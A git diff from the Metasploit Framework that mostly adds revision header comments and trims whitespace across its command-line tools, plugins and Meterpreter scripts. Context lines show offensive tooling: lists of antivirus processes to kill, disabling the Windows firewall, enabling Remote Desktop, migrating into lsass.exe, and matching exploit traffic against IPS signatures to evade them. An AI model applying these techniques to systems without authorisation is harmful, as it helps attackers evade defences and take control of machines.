$stdout.puts("\n" + Msf::Serializer::ReadableText.dump_advanced_options(nop, Indent)) if nop + $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_advanced_options(nop, Indent)) if nop when "i" $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_evasion_options(exploit, Indent)) $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_evasion_options(payload, Indent)) if payload $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_evasion_options(encoder, Indent)) if encoder - $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_evasion_options(nop, Indent)) if nop + $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_evasion_options(nop, Indent)) if nop when "p" if (module_class == 'exploit') $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_compatible_payloads(exploit, Indent, "Compatible payloads")) 
@@ -201,13 +205,13 @@ case mode.downcase $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_exploit_targets(exploit, Indent)) else $stdout.puts("\nError: This type of module does not support targets") - end + end when "ac" if (module_class == 'auxiliary') $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_auxiliary_actions(exploit, Indent)) else $stdout.puts("\nError: This type of module does not support actions") - end + end when "c" if (module_class == 'exploit') begin @@ -227,9 +231,9 @@ case mode.downcase $stdout.puts("\nError: This type of module does not support the check feature") end when "e" - + case module_class - when 'exploit' + when 'exploit' begin session = exploit.exploit_simple( 'Encoder' => exploit.datastore['ENCODER'], @@ -266,7 +270,7 @@ case mode.downcase $stderr.puts("Auxiliary failed: #{$!}") $stderr.puts("Backtrace:") $stderr.puts($!.backtrace.join("\n")) - end + end end else usage("Invalid mode #{mode}") diff --git a/msfconsole b/msfconsole index 4bffe80cfd..cb90d95829 100755 --- a/msfconsole +++ b/msfconsole @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface provides users with a command console interface to the # framework. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) @@ -57,12 +61,12 @@ class OptsConsole opts.on("-v", "--version", "Show version") do |v| options['Version'] = true end - + # Boolean switch. opts.on("-L", "--real-readline", "Use the system Readline library instead of RbReadline") do |v| options['RealReadline'] = true end - + opts.separator "" opts.separator "Common options:" diff --git a/msfd b/msfd index c2d21c1648..e54a495917 100755 --- a/msfd +++ b/msfd 
@@ -1,10 +1,14 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface listens on a port and provides clients that connect to # it with an msfconsole instance. The nice thing about this interface is that # it allows multiple clients to share one framework instance and thus makes it # possible for sessions to to be shared from a single vantage point. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfelfscan b/msfelfscan index d4ce4d44af..9693aabe19 100755 --- a/msfelfscan +++ b/msfelfscan @@ -1,6 +1,8 @@ #!/usr/bin/env ruby - +# # $Id$ +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfencode b/msfencode index bcdcf1151a..0247904404 100755 --- a/msfencode +++ b/msfencode @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfgui b/msfgui index 89d6aec3da..c8571fce54 100755 --- a/msfgui +++ b/msfgui @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This is a basic user interface using the Gtk2 GUI library # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfmachscan b/msfmachscan index b8739a9925..d8cf52dca6 100755 --- a/msfmachscan +++ b/msfmachscan @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfopcode b/msfopcode index 5400866ace..525cbb9795 100755 --- a/msfopcode +++ b/msfopcode @@ -1,9 +1,13 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface provides a command line interface to the Metasploit # Opcode Database. It provides users with the ability to search for opcodes # and to display information about modules. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfpayload b/msfpayload index 72c30ad528..aa61ab9e3f 100755 --- a/msfpayload +++ b/msfpayload @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) 
diff --git a/msfpescan b/msfpescan index 8021b5fb90..cd688aef97 100755 --- a/msfpescan +++ b/msfpescan @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfrpc b/msfrpc index 950ecb4f2c..cf53edcaf5 100755 --- a/msfrpc +++ b/msfrpc @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface allows users to interact with a remote framework # instance through a XMLRPC socket. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) @@ -25,7 +29,7 @@ arguments = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner" ] ) -opts = { +opts = { 'User' => 'msf', 'SSL' => true, 'ServerPort' => 55553 @@ -69,7 +73,7 @@ $0 = "msfrpc" rpc = Msf::RPC::Client.new( :host => opts['ServerHost'], :port => opts['ServerPort'], - :ssl => opts['SSL'] + :ssl => opts['SSL'] ) res = rpc.login(opts['User'], opts['Pass']) diff --git a/msfrpcd b/msfrpcd index 8fb0d66218..5a1a0e8fbc 100755 --- a/msfrpcd +++ b/msfrpcd @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface listens on a port and provides clients that connect to # it with an XMLRPC interface to the Metasploit Framework. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) @@ -27,7 +31,7 @@ arguments = Rex::Parser::Arguments.new( "-f" => [ false, "Run the daemon in the foreground" ], "-h" => [ false, "Help banner" ]) -opts = { +opts = { 'RunInForeground' => true, 'SSL' => true, 'ServerHost' => '0.0.0.0', @@ -54,9 +58,9 @@ arguments.parse(ARGV) { |opt, idx, val| when "-f" foreground = true when "-t" - opts['ServerType'] = val + opts['ServerType'] = val when "-u" - opts['URI'] = val + opts['URI'] = val when "-h" print("\nUsage: #{File.basename(__FILE__)} \n" + arguments.usage) exit diff --git a/msfweb b/msfweb index 253d29408c..29c54c00bb 100755 --- a/msfweb +++ b/msfweb 
@@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface provides users with a web-based interface to the framework # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/plugins/auto_add_route.rb b/plugins/auto_add_route.rb index 630f7d22ac..b2b1b29468 100644 --- a/plugins/auto_add_route.rb +++ b/plugins/auto_add_route.rb @@ -1,3 +1,8 @@ +# +# $Id$ +# $Revision$ +# + module Msf class Plugin::AutoAddRoute < Msf::Plugin include Msf::SessionEvent diff --git a/plugins/db_credcollect.rb b/plugins/db_credcollect.rb index 5943f561f8..fa71b2a5fc 100644 --- a/plugins/db_credcollect.rb +++ b/plugins/db_credcollect.rb @@ -1,4 +1,11 @@ +# +# $Id$ +# # credcollect - tebo[at]attackresearch.com +# +# $Revision$ +# + module Msf class Plugin::CredCollect < Msf::Plugin diff --git a/plugins/db_mysql.rb b/plugins/db_mysql.rb index 0d74f35e2e..f627d188ec 100644 --- a/plugins/db_mysql.rb +++ b/plugins/db_mysql.rb @@ -1,3 +1,7 @@ +# +# $Id$ +# $Revision$ +# module Msf class Plugin::DeprecatedStub < Msf::Plugin diff --git a/plugins/db_postgres.rb b/plugins/db_postgres.rb index 0d74f35e2e..f627d188ec 100644 --- a/plugins/db_postgres.rb +++ b/plugins/db_postgres.rb @@ -1,3 +1,7 @@ +# +# $Id$ +# $Revision$ +# module Msf class Plugin::DeprecatedStub < Msf::Plugin diff --git a/plugins/db_sqlite2.rb b/plugins/db_sqlite2.rb index 0d74f35e2e..f627d188ec 100644 --- a/plugins/db_sqlite2.rb +++ b/plugins/db_sqlite2.rb @@ -1,3 +1,7 @@ +# +# $Id$ +# $Revision$ +# module Msf class Plugin::DeprecatedStub < Msf::Plugin diff --git a/plugins/db_sqlite3.rb b/plugins/db_sqlite3.rb index 0d74f35e2e..dc1546ae6a 100644 --- a/plugins/db_sqlite3.rb +++ b/plugins/db_sqlite3.rb @@ -1,3 +1,7 @@ +## +# $Id$ +# $Revision$ +## module Msf class Plugin::DeprecatedStub < Msf::Plugin diff --git a/plugins/db_tracker.rb b/plugins/db_tracker.rb index 898aea5ea1..d36239f767 100644 --- a/plugins/db_tracker.rb +++ b/plugins/db_tracker.rb 
@@ -1,7 +1,12 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### -# +# # This class hooks all socket calls and updates the database with # data gathered from the connection parameters # @@ -26,21 +31,21 @@ class Plugin::DB_Tracer < Msf::Plugin if (sock.peerhost != '0.0.0.0' and sock.peerport) - # Ignore sockets that didn't set up their context + # Ignore sockets that didn't set up their context # to hold the framework in 'Msf' return if not param.context['Msf'] host = param.context['Msf'].db.find_or_create_host(:host => sock.peerhost, :state => Msf::HostState::Alive) return if not host - + param.context['Msf'].db.report_service(:host => host, :proto => param.proto, :port => sock.peerport) end - end + end end - + def initialize(framework, opts) super - + if(not framework.db.active) raise PluginLoadError.new("The database backend has not been initialized") end @@ -49,7 +54,7 @@ class Plugin::DB_Tracer < Msf::Plugin raise PluginLoadError.new("This plugin should not be loaded more than once") end } - + @eh = DBTracerEventHandler.new Rex::Socket::Comm::Local.register_event_handler(@eh) end diff --git a/plugins/db_wmap.rb b/plugins/db_wmap.rb index e2a3466e3d..a7b7275b35 100644 --- a/plugins/db_wmap.rb +++ b/plugins/db_wmap.rb @@ -1,10 +1,15 @@ +# +# $Id$ +# $Revision$ +# + require 'fileutils' require 'msf/ui/console/command_dispatcher/wmap' module Msf ### -# +# # This class intializes the database db with a shiny new # SQLite3 database instance. # @@ -29,17 +34,17 @@ class Plugin::DBWmap < Msf::Plugin def name "Wmap SQLite3 Database" end - + # # The initial command set - # + # def commands { } - end + end end - + # # Wrapper class for the database command dispatcher # 
@@ -53,22 +58,22 @@ class Plugin::DBWmap < Msf::Plugin # Database specific initialization goes here # ### - + def initialize(framework, opts) super - - #add_console_dispatcher(WmapDatabaseCommandDispatcher) - - add_console_dispatcher(WmapSQLiteCommandDispatcher) - add_console_dispatcher(WmapDatabaseCommandDispatcher) - print_status("=[ WMAP v#{WMAPVersion} - #{WMAPAuthor}") + #add_console_dispatcher(WmapDatabaseCommandDispatcher) + + add_console_dispatcher(WmapSQLiteCommandDispatcher) + add_console_dispatcher(WmapDatabaseCommandDispatcher) + + print_status("=[ WMAP v#{WMAPVersion} - #{WMAPAuthor}") end - + def cleanup remove_console_dispatcher('Wmap SQLite3 Database') - remove_console_dispatcher('Wmap Database Backend') + remove_console_dispatcher('Wmap Database Backend') end # diff --git a/plugins/event_tester.rb b/plugins/event_tester.rb index df02a17521..df8c0beb4a 100644 --- a/plugins/event_tester.rb +++ b/plugins/event_tester.rb @@ -1,3 +1,7 @@ +# +# $Id$ +# $Revision$ +# module Msf diff --git a/plugins/ips_filter.rb b/plugins/ips_filter.rb index 923b9111f2..7b4035bd46 100644 --- a/plugins/ips_filter.rb +++ b/plugins/ips_filter.rb @@ -1,8 +1,13 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### -# -# This class hooks all sockets created by a running exploit +# +# This class hooks all sockets created by a running exploit # and prevents data from being sent that matches a known IPS # signature. # @@ -27,9 +32,9 @@ class Plugin::IPSFilter < Msf::Plugin sock.extend(IPSFilter::SocketTracer) sock.context = param.context end - end + end end - + def initialize(framework, opts) super @@ -74,7 +79,7 @@ module SocketTracer r = super(length, opts) if (ips_match(r)) $stderr.puts "*** Incoming read may match a known signature" - end + end return r end @@ -85,7 +90,7 @@ module SocketTracer def ips_match(data) lp = localport rp = peerport - + SIGS.each do |s| begin r = Regexp.new(s[1]) 
@@ -97,18 +102,18 @@ module SocketTracer $stderr.puts "*** Compiled error: #{s[1]}" end end - + return false end - + # Extend this as needed :-) - SIGS = + SIGS = [ ['DCOM.C', ".*\\\x5c\x00\\\x5c\x00\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00.*\xcc\xe0\xfd\x7f.*"], ['BLASTER', ".*\\\x5c\x00\\\x5c\x00\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00.*\xcc\xe0\xfd\x7f.*"], ['REMACT', ".*\xb8\x4a\x9f\x4d\x1c\\}\xcf\x11\x86\x1e\x00\x20\xaf\x6e.*"], ['x86 NOP SLED', "\x90\x90"], - ] + ] end end diff --git a/plugins/msfd.rb b/plugins/msfd.rb index 89b611ca4c..3eadba8cdc 100644 --- a/plugins/msfd.rb +++ b/plugins/msfd.rb @@ -1,11 +1,15 @@ #!/usr/bin/env ruby # +# $Id$ +# # This plugin provides an msf daemon interface that spawns a listener on a # defined port (default 55554) and gives each connecting client its own # console interface. These consoles all share the same framework instance. # Be aware that the console instance that spawns on the port is entirely # unauthenticated, so realize that you have been warned. # +# $Revision$ +# module Msf diff --git a/plugins/nexpose.rb b/plugins/nexpose.rb index e1d5c5b2ad..2482686b54 100644 --- a/plugins/nexpose.rb +++ b/plugins/nexpose.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This plugin provides integration with Rapid7 NeXpose # +# $Revision$ +# require 'rapid7/nexpose' diff --git a/plugins/pcap_log.rb b/plugins/pcap_log.rb index 5c08cc5093..00a094b8ef 100644 --- a/plugins/pcap_log.rb +++ b/plugins/pcap_log.rb 
@@ -3,28 +3,30 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## +# $Revision$ + require 'packetfu' module Msf class Plugin::PcapLog < Msf::Plugin include PacketFu - + def no_pcaprub_error - print_error(" -- PcapRub is not installed -- ") + print_error(" -- PcapRub is not installed -- ") print_error("Make sure you have libpcap-dev and try the following commands") print_error("to install it:") print_error("\t$ cd external/pcaprub/") print_error("\t$ ruby extconf.rb && make && sudo make install") end def usage - print_error("No interface given") + print_error("No interface given") print ("usage: load #{self.name} iface= [path=] [prefix=] [filter=\"\"]\n") end @@ -35,14 +37,14 @@ class Plugin::PcapLog < Msf::Plugin iface = opts['iface'] || nil filter = opts['filter'] - begin + begin require 'pcaprub' rescue LoadError self.no_pcaprub_error raise end - if (iface.nil?) + if (iface.nil?) self.usage raise RuntimeError.new("No interface specified") end @@ -61,7 +63,7 @@ class Plugin::PcapLog < Msf::Plugin begin while true while (this_pkt = stream.next) - if this_pkt + if this_pkt PacketFu::Write.append(:file => @capture_file, :pkt => this_pkt) else print_status("No packets") diff --git a/plugins/sample.rb b/plugins/sample.rb index 0d69dc675c..7f697507a9 100644 --- a/plugins/sample.rb +++ b/plugins/sample.rb @@ -1,12 +1,17 @@ +# +# $Id$ +# + module Msf ### -# +# # This class illustrates a sample plugin. Plugins can change the behavior of # the framework by adding new features, new user interface commands, or # through any other arbitrary means. They are designed to have a very loose # definition in order to make them as useful as possible. # +# $Revision$ ### class Plugin::Sample < Msf::Plugin 
@@ -38,7 +43,7 @@ class Plugin::Sample < Msf::Plugin # This method handles the sample command. # def cmd_sample(*args) - print_line("You passed: #{args.join(' ')}") + print_line("You passed: #{args.join(' ')}") end end @@ -68,7 +73,7 @@ class Plugin::Sample < Msf::Plugin def cleanup # If we had previously registered a console dispatcher with the console, # deregister it now. - remove_console_dispatcher('Sample') + remove_console_dispatcher('Sample') end # diff --git a/plugins/session_tagger.rb b/plugins/session_tagger.rb index 2cf096c4f5..9d22439bd5 100644 --- a/plugins/session_tagger.rb +++ b/plugins/session_tagger.rb @@ -1,3 +1,8 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### diff --git a/plugins/socket_logger.rb b/plugins/socket_logger.rb index 384ad33561..277aae5b2e 100644 --- a/plugins/socket_logger.rb +++ b/plugins/socket_logger.rb @@ -1,8 +1,13 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### -# -# This class hooks all sockets created by a running exploit +# +# This class hooks all sockets created by a running exploit # ### @@ -15,7 +20,7 @@ class Plugin::SocketLogger < Msf::Plugin ### class MySocketEventHandler include Rex::Socket::Comm::Events - + def initialize(path, prefix) @path = path @prefix = prefix @@ -31,16 +36,16 @@ class Plugin::SocketLogger < Msf::Plugin sock.context = param.context sock.params = param sock.initlog(@path, @prefix) - + end - end + end end - + def initialize(framework, opts) log_path = opts['path'] || "/tmp" log_prefix = opts['prefix'] || "socket_" - + super @eh = MySocketEventHandler.new(log_path, log_prefix) Rex::Socket::Comm::Local.register_event_handler(@eh) @@ -68,7 +73,7 @@ module SocketLogger module SocketTracer @@last_id = 0 - + attr_accessor :context, :params # Hook the write method @@ -81,7 +86,7 @@ module SocketTracer # Hook the read method def read(length = nil, opts = {}) r = super(length, opts) - + @fd.puts "READ (#{r.length} bytes)" @fd.puts Rex::Text.to_hex_dump(r) return r 
@@ -91,7 +96,7 @@ module SocketTracer super(*args) @fd.close end - + def initlog(path, prefix) @log_path = path @log_prefix = prefix diff --git a/plugins/sounds.rb b/plugins/sounds.rb index 68b78a5dff..53a7c99c32 100644 --- a/plugins/sounds.rb +++ b/plugins/sounds.rb @@ -1,3 +1,8 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### diff --git a/plugins/thread.rb b/plugins/thread.rb index 1c504d165c..abf329a89e 100644 --- a/plugins/thread.rb +++ b/plugins/thread.rb @@ -1,7 +1,12 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### -# +# # This class illustrates a sample plugin. Plugins can change the behavior of # the framework by adding new features, new user interface commands, or # through any other arbitrary means. They are designed to have a very loose @@ -41,7 +46,7 @@ class Plugin::ThreadTest < Msf::Plugin print_line("Test thread is already running") return end - + @mythread = ::Thread.new { while(true) print_line("--- test thread ---") @@ -50,24 +55,24 @@ class Plugin::ThreadTest < Msf::Plugin } print_line("Test thread created") end - + def cmd_stop_thread(*args) if (! @mythread) print_line("No test thread is running") return end - + @mythread.kill @mythread = nil print_line("Test thread stopped") end - + def cmd_list_thread(*args) Thread.list.each do |t| print_line(sprintf("Thread: 0x%.8x (%s/%d) (%s)", t.object_id, t.status, t.priority, t.tsource)) print_line("") end - end + end end # @@ -108,7 +113,7 @@ class Plugin::ThreadTest < Msf::Plugin def cleanup # If we had previously registered a console dispatcher with the console, # deregister it now. - remove_console_dispatcher('ThreadTest') + remove_console_dispatcher('ThreadTest') end # diff --git a/plugins/token_hunter.rb b/plugins/token_hunter.rb index 623e579122..0bf1722b3a 100644 --- a/plugins/token_hunter.rb +++ b/plugins/token_hunter.rb @@ -1,3 +1,8 @@ +# +# $Id$ +# $Revision$ +# + module Msf class Plugin::TokenHunter < Msf::Plugin 
diff --git a/plugins/xmlrpc.rb b/plugins/xmlrpc.rb index 6b825dd6b5..131a530bea 100644 --- a/plugins/xmlrpc.rb +++ b/plugins/xmlrpc.rb @@ -1,11 +1,15 @@ #!/usr/bin/env ruby # +# $Id$ +# # This plugin provides an msf daemon interface that spawns a listener on a # defined port (default 55553) and gives each connecting client its own # console interface. These consoles all share the same framework instance. # Be aware that the console instance that spawns on the port is entirely # unauthenticated, so realize that you have been warned. # +# $Revision$ +# require "msf/core/rpc" require "fileutils" @@ -36,18 +40,18 @@ class Plugin::XMLRPC < Msf::Plugin # def initialize(framework, opts) super - + host = opts['ServerHost'] || DefaultHost port = opts['ServerPort'] || DefaultPort ssl = (opts['SSL'] and opts['SSL'].to_s =~ /^[ty]/i) ? true : false cert = opts['SSLCert'] ckey = opts['SSLKey'] - + user = opts['User'] || "msf" pass = opts['Pass'] || ::Rex::Text.rand_text_alphanumeric(8) type = opts['ServerType'] || "Basic" uri = opts['URI'] || "/RPC2" - + print_status(" XMLRPC Service: #{host}:#{port} #{ssl ? " (SSL)" : ""}") print_status("XMLRPC Username: #{user}") print_status("XMLRPC Password: #{pass}") 
@@ -88,43 +92,43 @@ class Plugin::XMLRPC < Msf::Plugin # # The meat of the plugin, sets up handlers for requests - # + # def run - + # Initialize the list of authenticated sessions @tokens = {} - + args = [framework,@tokens,@users] - + # Add handlers for every class - self.server.add_handler(::XMLRPC::iPIMethods("auth"), + self.server.add_handler(::XMLRPC::iPIMethods("auth"), ::Msf::RPC::Auth.new(*args) ) - - self.server.add_handler(::XMLRPC::iPIMethods("core"), + + self.server.add_handler(::XMLRPC::iPIMethods("core"), ::Msf::RPC::Core.new(*args) ) - + self.server.add_handler(::XMLRPC::iPIMethods("session"), ::Msf::RPC::Session.new(*args) ) - + self.server.add_handler(::XMLRPC::iPIMethods("job"), ::Msf::RPC::Job.new(*args) ) - + self.server.add_handler(::XMLRPC::iPIMethods("module"), ::Msf::RPC::Module.new(*args) ) - - # Set the default/catch-all handler + + # Set the default/catch-all handler self.server.set_default_handler do |name, *args| raise ::XMLRPC::FaultException.new(-99, "Method #{name} missing or wrong number of parameters!") end - + # Start the actual service self.server.start - + # Wait for the service to complete self.server.wait end diff --git a/scripts/meterpreter/checkvm.rb b/scripts/meterpreter/checkvm.rb index 9f5461e8d9..c92cf0cae0 100644 --- a/scripts/meterpreter/checkvm.rb +++ b/scripts/meterpreter/checkvm.rb @@ -53,7 +53,7 @@ def hypervchk(session) end rescue end - end + end return vm end @@ -98,7 +98,7 @@ def vmwarechk(session) session.sys.process.get_processes().each do |x| if p == (x['name'].downcase) print_status("This is a VMware Virtual Machine") if not vm - vm = true + vm = true end end end @@ -312,7 +312,7 @@ end print_status("Checking if target is a Virtual Machine .....") found = hypervchk(session) -found = vmwarechk(session) if not found +found = vmwarechk(session) if not found found = checkvrtlpc(session) if not found found = vboxchk(session) if not found found = xenchk(session) if not found 
diff --git a/scripts/meterpreter/getcountermeasure.rb b/scripts/meterpreter/getcountermeasure.rb index 376331aeef..f965973aab 100644 --- a/scripts/meterpreter/getcountermeasure.rb +++ b/scripts/meterpreter/getcountermeasure.rb @@ -1,7 +1,7 @@ # $Id$ # # Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. -# Provides also the option to kill the processes of detected products and disable the built-in firewall. +# Provides also the option to kill the processes of detected products and disable the built-in firewall. # Provided by Carlos Perez at carlos_perez[at]darkoperator.com # Version: 0.1.0 session = client @@ -20,7 +20,7 @@ def usage end #------------------------------------------------------------------------------- -avs = %W{ +avs = %W{ a2adguard.exe a2adwizard.exe a2antidialer.exe @@ -34,9 +34,9 @@ avs = %W{ a2start.exe a2sys.exe a2upd.exe - aavgapi.exe + aavgapi.exe aawservice.exe - aawtray.exe + aawtray.exe ad-aware.exe ad-watch.exe alescan.exe @@ -109,10 +109,10 @@ avs = %W{ defensewall.exe defensewall_serv.exe defwatch.exe - f-agnt95.exe + f-agnt95.exe fpavupdm.exe - f-prot95.exe - f-prot.exe + f-prot95.exe + f-prot.exe fprot.exe fsaua.exe fsav32.exe @@ -121,7 +121,7 @@ avs = %W{ fsm32.exe fsma32.exe fssm32.exe - f-stopw.exe + f-stopw.exe f-stopw.exe fwservice.exe fwsrv.exe @@ -131,7 +131,7 @@ avs = %W{ icmon.exe idsinst.exe idslu.exe - inetupd.exe + inetupd.exe irsetup.exe isafe.exe isignup.exe @@ -244,7 +244,7 @@ avs = %W{ vsaccess.exe vsserv.exe wcantispy.exe - win-bugsfix.exe + win-bugsfix.exe winpatrol.exe winpatrolex.exe wrsssdk.exe @@ -276,7 +276,7 @@ def checklocalfw(session,killfw) opmode = "" r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true}) while(d = r.channel.read) - opmode << d + opmode << d end r.channel.close r.close 
@@ -311,7 +311,7 @@ def checkdep(session) r.close r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true}) while(d = r.channel.read) - tmpout << d + tmpout << d end r.channel.close r.close @@ -325,7 +325,7 @@ def checkdep(session) print_status("\tDEP is limited to Windows system binaries.") elsif depmode.to_s == "3" print_status("\tDEP is on for all programs and services.") - end + end end #------------------------------------------------------------------------------- diff --git a/scripts/meterpreter/getgui.rb b/scripts/meterpreter/getgui.rb index f1f8498c6b..58d7a2dd6f 100644 --- a/scripts/meterpreter/getgui.rb +++ b/scripts/meterpreter/getgui.rb @@ -53,7 +53,7 @@ def enablerd(session) open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) v = open_key.query_value(value) print_status "Enabling Remote Desktop" - if v.data == 1 + if v.data == 1 print_status "\tRDP is disabled; enabling it ..." open_key = session.sys.registry.open_key(root_key, base_key, KEY_WRITE) open_key.set_value(value, session.sys.registry.type2str("REG_DWORD"), 0) @@ -63,7 +63,7 @@ def enablerd(session) rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end - + end diff --git a/scripts/meterpreter/gettelnet.rb b/scripts/meterpreter/gettelnet.rb index b8beed594f..01f4fb2a5c 100644 --- a/scripts/meterpreter/gettelnet.rb +++ b/scripts/meterpreter/gettelnet.rb @@ -23,7 +23,7 @@ def checkifinst(session) if d =~ (/TlntSvr/) return true end - + end r.channel.close r.close @@ -32,7 +32,7 @@ end #--------------------------------------------------------------------------------------------------------- def insttlntsrv(session) trgtos = session.sys.config.sysinfo - if trgtos =~ /(Windows Vista)/ + if trgtos =~ /(Windows Vista)/ if checkifinst(session) print_status("Telnet Service Installed on Target") else 
diff --git a/scripts/meterpreter/hostsedit.rb b/scripts/meterpreter/hostsedit.rb index 6916c3232d..25167422a0 100644 --- a/scripts/meterpreter/hostsedit.rb +++ b/scripts/meterpreter/hostsedit.rb @@ -1,6 +1,6 @@ # $Id$ # Meterpreter script for modifying the hosts file in windows -# given a single entrie or several in a file and clear the +# given a single entrie or several in a file and clear the # DNS cache on the target machine. # This script works with Windows 2000,Windows XP,Windows 2003, # Windows Vista and Windows 2008. @@ -75,7 +75,7 @@ end backuphosts(session,hosts) add2hosts(session,val,hosts) cleardnscach(session) - when "-l" + when "-l" checkuac(session) if not ::File.exists?(val) raise "File #{val} does not exists!" diff --git a/scripts/meterpreter/killav.rb b/scripts/meterpreter/killav.rb index 6b73dd646a..85fccecafe 100644 --- a/scripts/meterpreter/killav.rb +++ b/scripts/meterpreter/killav.rb @@ -22,7 +22,7 @@ end print_status("Killing Antivirus services on the target...") avs = %W{ - AAWTray.exe + AAWTray.exe Ad-Aware.exe MSASCui.exe _avp32.exe @@ -74,7 +74,7 @@ avs = %W{ avltmain.exe avnt.exe avp.exe - avp.exe + avp.exe avp32.exe avpcc.exe avpdos32.exe diff --git a/scripts/meterpreter/migrate.rb b/scripts/meterpreter/migrate.rb index f1c1da3503..8319b0c6d3 100644 --- a/scripts/meterpreter/migrate.rb +++ b/scripts/meterpreter/migrate.rb @@ -1,6 +1,6 @@ # $Id$ # -# Simple example script that migrates to a specific process by name. +# Simple example script that migrates to a specific process by name. # This is meant as an illustration. # @@ -39,7 +39,7 @@ if ! spawn # Get the target process name target ||= "lsass.exe" print_status("Migrating to #{target}...") - + # Get the target process pid target_pid = client.sys.process[target] diff --git a/scripts/meterpreter/multi_console_command.rb b/scripts/meterpreter/multi_console_command.rb index 6e68fef6cc..25bcc0eb52 100644 --- a/scripts/meterpreter/multi_console_command.rb 
+++ b/scripts/meterpreter/multi_console_command.rb @@ -1,9 +1,14 @@ -# $Id:$ -#Meterpreter script for running multiple console commands on a meterpreter session -#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com -#Verion: 0.1 +# $Id$ +# +# Meterpreter script for running multiple console commands on a meterpreter session +# Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com +# Verion: 0.1 +# +# $Revision$ + ################## Variable Declarations ################## session = client + # Setting Arguments @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false,"Help menu." ], diff --git a/scripts/meterpreter/multicommand.rb b/scripts/meterpreter/multicommand.rb index c966bc0ad1..7cf282ed3c 100644 --- a/scripts/meterpreter/multicommand.rb +++ b/scripts/meterpreter/multicommand.rb @@ -86,7 +86,7 @@ end } -if args.length == 0 or help == 1 +if args.length == 0 or help == 1 usage elsif outfile == nil list_exec(session,commands).each_line do |l| diff --git a/scripts/meterpreter/multiscript.rb b/scripts/meterpreter/multiscript.rb index d8d88e6675..69435e5b4e 100644 --- a/scripts/meterpreter/multiscript.rb +++ b/scripts/meterpreter/multiscript.rb @@ -4,7 +4,7 @@ #Verion: 0.2 ################## Variable Declarations ################## session = client -# Setting Argument +# Setting Argument @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false,"Help menu." ], @@ -59,7 +59,7 @@ end end end -if args.length == 0 or help == 1 +if args.length == 0 or help == 1 usage else print_status("Running Multiscript script.....") diff --git a/scripts/meterpreter/netenum.rb b/scripts/meterpreter/netenum.rb index d82c596818..55ff7f0a9e 100644 --- a/scripts/meterpreter/netenum.rb +++ b/scripts/meterpreter/netenum.rb @@ -152,7 +152,7 @@ def frwdlp(session,hostlst,domain,dest) break end end - + r.channel.close r.close } 
